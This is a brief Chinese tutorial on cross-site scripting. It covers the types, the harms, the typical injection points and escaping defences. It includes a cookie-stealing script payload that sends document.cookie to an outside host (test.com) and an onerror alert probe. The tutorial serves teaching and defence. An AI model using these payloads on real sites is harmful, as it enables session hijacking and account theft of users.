简介

xss（Cross Site Scripting）跨站脚本攻击。原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码，当用户浏览该网站时，HTML（）代码会自动执行，从而达到攻击的目的。

xss最常见是反射型xss，存储型xss。xss危害有几点
1.盗取用户、管理员cookie后使用cookie登录，成为用户。
2.使用xss修改网页或重定向进行钓鱼。

利用

一般比较多的是存在搜索框或者评论框...比如这样



常使用的：

<script>document.write("<img src=\"test.com/a.php?cookie=\"+document.cookie)</script>
<img src="" onerror="alert(/xss/)">

防御
一般防御把'"<>/\等过滤就差不多了，php可使用htmlspecialchars()等函数。